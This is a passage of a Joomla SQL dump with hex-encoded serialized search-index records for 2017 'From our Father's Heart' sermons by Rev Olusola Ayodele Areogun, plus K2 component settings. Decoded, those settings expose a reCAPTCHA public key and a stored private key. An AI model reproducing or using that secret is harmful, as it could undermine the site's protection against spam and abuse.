2c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223234223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a3130343a2235323a69662d796f752d6172652d77696c6c696e672d616e642d6f62656469656e742d796f752d7368616c6c2d6561742d7468652d676f6f642d6f662d7468652d6c616e642d66726f6d2d6f75722d6661746865722d732d68656172742d31382d30362d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a3132323a22636f6d706f6e656e742f6b322f6974656d2f35322d69662d796f752d6172652d77696c6c696e672d616e642d6f62656469656e742d796f752d7368616c6c2d6561742d7468652d676f6f642d6f662d7468652d6c616e642d66726f6d2d6f75722d6661746865722d732d68656172742d31382d30362d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3532223b733a353a22726f757465223b733a3134313a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d35323a69662d796f752d6172652d77696c6c696e672d616e642d6f62656469656e742d796f752d7368616c6c2d6561742d7468652d676f6f642d6f662d7468652d6c616e642d66726f6d2d6f75722d6661746865722d732d68656172742d31382d30362d32303137223b733a353a227469746c65223b733a3130363a22496620796f75206172652077696c6c696e6720616e64206f62656469656e742c20796f75207368616c6c206561742074686520676f6f64206f6620746865206c616e64202d2046726f6d206f7572204661746865722773204865617274202831382f30362f3230313729223b733a31313a226465736372697074696f6e223b733a3431383a2220546865204269626c65207361797320696620796f75206172652077696c6c696e6720616e64206f62656469656e742c20796f75207368616c6c206561742074686520676f6f64206f6620746865206c616e642e2054686520726f6f74206f662070726f626c656d73206265747765656e20476f6420616e64204869732070656f706c6520697320646976696e6520696e737472756374696f6e732e20496e737472756374696f6e2069732077686174206b656570732075732077697468696e20646976696e6520737472756374757265207768657265206f75722070726f74656374696f6e20616e642070726f7370657269747920697320736563757265642e205768656e6576657220796f75207265636569766520616e20696e737472756374696f6e2066726f6d20746865204c6f72642c20616c7761797320636f6d6d697420796f757273656c6620746f206f6265792e2044656c61796564206f62656469656e636520757375616c6c79206265636f6d6573206f7574726967687420616e64206576656e7475616c206469736f62656469656e636520746f20476f642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30362d31382031323a32323a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30362d31382031323a32323a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(280, 'index.php?option=com_k2&view=item&id=53', 'index.php?option=com_k2&view=item&id=53:embrace-discipline-from-our-father-s-heart-25-06-2017', 'Embrace discipline! - From our Father\'s Heart (25/06/2017)', ' Embrace discipline! To be disciplined means to receive training that corrects you, moulds you, or perfects moral character and behaviour in you. It means adjusting inside to training. It means that you have accepted discipleship (that is, a set of values) and have internalised it such that it controls and affects your decisions. ', '2017-07-16 09:55:41', '1beec628995b8da372aeb65609041a8d', 1, 1, 1, '*', '2017-06-25 13:11:18', '0000-00-00 00:00:00', '2017-06-25 13:11:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223533223b733a353a22616c696173223b733a35333a22656d62726163652d6469736369706c696e652d66726f6d2d6f75722d6661746865722d732d68656172742d32352d30362d32303137223b733a373a2273756d6d617279223b733a3334333a223c703e456d6272616365206469736369706c696e652120546f206265206469736369706c696e6564206d65616e7320746f207265636569766520747261696e696e67207468617420636f72726563747320796f752c206d6f756c647320796f752c206f72207065726665637473206d6f72616c2063686172616374657220616e64206265686176696f757220696e20796f752e204974206d65616e732061646a757374696e6720696e7369646520746f20747261696e696e672e204974206d65616e73207468617420796f752068617665206163636570746564206469736369706c657368697020287468617420c2a069732c206120736574206f662076616c7565732920616e64206861766520696e7465726e616c697365642069742073756368207468617420697420636f6e74726f6c7320616e64206166666563747320796f7572206465636973696f6e732ec2a03c2f703e0d0a223b733a343a22626f6479223b733a323534313a220d0a3c703e4469736369706c696e65206973207768617420636f6e646974696f6e7320796f7572206c69666520666f7220646976696e6520626c657373696e677320746f20636f6d6520696e746f20616e642072656d61696e2074686572652e20576974686f7574206469736369706c696e652c20796f7572206c696665206265636f6d657320706f726f757320616e64206f70656e20746f20616c6c206b696e6473206f66206f70706f7274756e697374696320c2a064656d6f6e7320746f20656e74657220796f7572206c69666520616e6420616666616972732063617573696e67206469736f7264657220616e64206368616f732e20556e6469736369706c696e656420636875726368206d656d626572732061726520746865206f6e65732077686f2061726520c2a0646966666963756c7420746f2068656c703b20746865792061726520746865206f6e6573207468617420706173746f722068616420746f207072617920666f72204f76657220616e64206f76657220616761696e2c20746865792066696e6420697420646966666963756c7420746f206f62657920696e737472756374696f6e7320c2a0616e642074686579206576656e7475616c6c79206265636f6d652076696374696d73206f66207468656972206f776e20636172656c6573736e6573732ec2a03c2f703e0d0a3c703e496e6469736369706c696e652068696e6465727320616e67656c732066726f6d20776f726b696e672c206d616b657320646976696e6520696e74657276656e74696f6e20646966666963756c742e20496e6469736369706c696e6520776173746573207265736f75726365732c2074696d6520616e6420656e657267792e20496e6469736369706c696e652063616e207265647563652061206d616e20746f2061207069656365206f6662726561642e204469736369706c696e65206f6e20746865206f746865722068616e64206d616b657320796f75207374726f6e6765722c206d616b657320796f75206d61747572652c206d616b657320796f75207269636865722c20616e64206d616b657320796f7520726561647920666f72206c6966652773206d61747465727320616e64206973737565732e204469736369706c696e65206d616b657320796f7520636f6d706f7365642ec2a03c2f703e0d0a3c703e416e20556e6469736369706c696e6564206d616e20686173206e6f7468696e6720696e206c6966653b20737563682061206d616e206973206120646973617374657220676f696e6720736f6d65776865726520746f2068617070656e2e20546865206368696c6472656e20616e6420c2a066616d696c79206f6620616e20756e6469736369706c696e6564206d616e2077696c6c20616c77617973207375666665722070616e69632061747461636b732c207768696c65207468652066616d696c79206f662061206469736369706c696e6564206d616e2077696c6c20616c7761797320626520617420726573742e205468617427732077687920696e2074686520447265616d2043656e7472652077652074616b6520796f75207468726f756768207365766572616c2070726f6772616d6d657320696e206f7264657220746f206469736369706c696e6520796f757220626f64792c20646573697265732c20656d6f74696f6e7320616e642061707065746974657320736f207468617420796f752063616e2062652066697420666f7220476f64277320706c616e20666f7220796f7572206c69666520616e642064657374696e792ec2a03c2f703e0d0a3c703e4469736369706c696e65206272696e677320646976696e65206f7264657220696e746f20796f7572206c6966652e204469736369706c696e652069732070617274206f66207768617420697320737570706c69656420746f20796f7520617320796f7520656d62726163652073747275637475726520696e2063687572636820616e6420616c69676e20796f7572206c69666520776974682069742e2045736175206c6f737420616c6c20746861742068652068616420746f206869732062726f746865722062656361757365206f6620696e6469736369706c696e652e204865207761732074686520686569722062792062697274682c206865206861642074686520626972746872696768742062757420686520636f756c64206e6f74206469736369706c696e65206869732061707065746974657320616e6420646573697265732ec2a03c2f703e0d0a3c703e42656c6f7665642c20796f7520646f6e2774206a7573742065617420657665727920666f6f64207468617420636f6d657320796f757220776179206c696b652045736175206f72206a756d70206174206576657279206368656170206f70706f7274756e697479206f746865727769736520796f75206d69676874206861766520636f6e73756d656420796f75722064657374696e79206f7665726e696768742e204469736369706c696e6520616c736f206272696e6773206469676e6974792c207265737065637420616e6420686f6e6f757220696e746f20796f7572206c6966652e20546865206d6f737420646976696e656c79207265737065637465642070656f706c65206f6e206561727468206172652070656f706c652077686f20617265206469736369706c696e65643b2074686579206d6179206e6f74206265206c6f76656420627920616c6c20627574207468657920617265207265737065637465642e20496e6469736369706c696e65206c6561647320746f207368616d6520616e6420726570726f6163682e20416363657074696e67206469736369706c696e65206d6179206e6f74206265207468652065617369657374207468696e6720746f20646f20627574207468657265206172652067726561742062656e6566697473207768656e20796f75206163636570742069742ec2a03c2f703e0d0a3c703e54686520447265616d2043656e747265206973206120686f757365206f6620747261696e696e672c206120706c616365206f6620646976696e65206469736369706c6573686970207468617420776f726b73204b696e67646f6d206469736369706c696e6520696e746f2074686520666162726963206f6620796f757220736f756c20657370656369616c6c7920696620796f7520726573706f6e642077697468207468652072696768742068656172742e204d616b6520757020c2a0796f7572206d696e6420746f2074616b65206469736369706c696e653b20697420697320666f7220796f757220676f6f6420616e6420666f722074686520676f6f64206f6620796f75722064657374696e792ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a65737573c2a03c2f703e0d0a3c703e476f6427732053657276616e74c2a03c2f703e0d0a3c703e5265762e204f6c75736f6c614172656f67756ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30372d31362030393a35353a3430223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412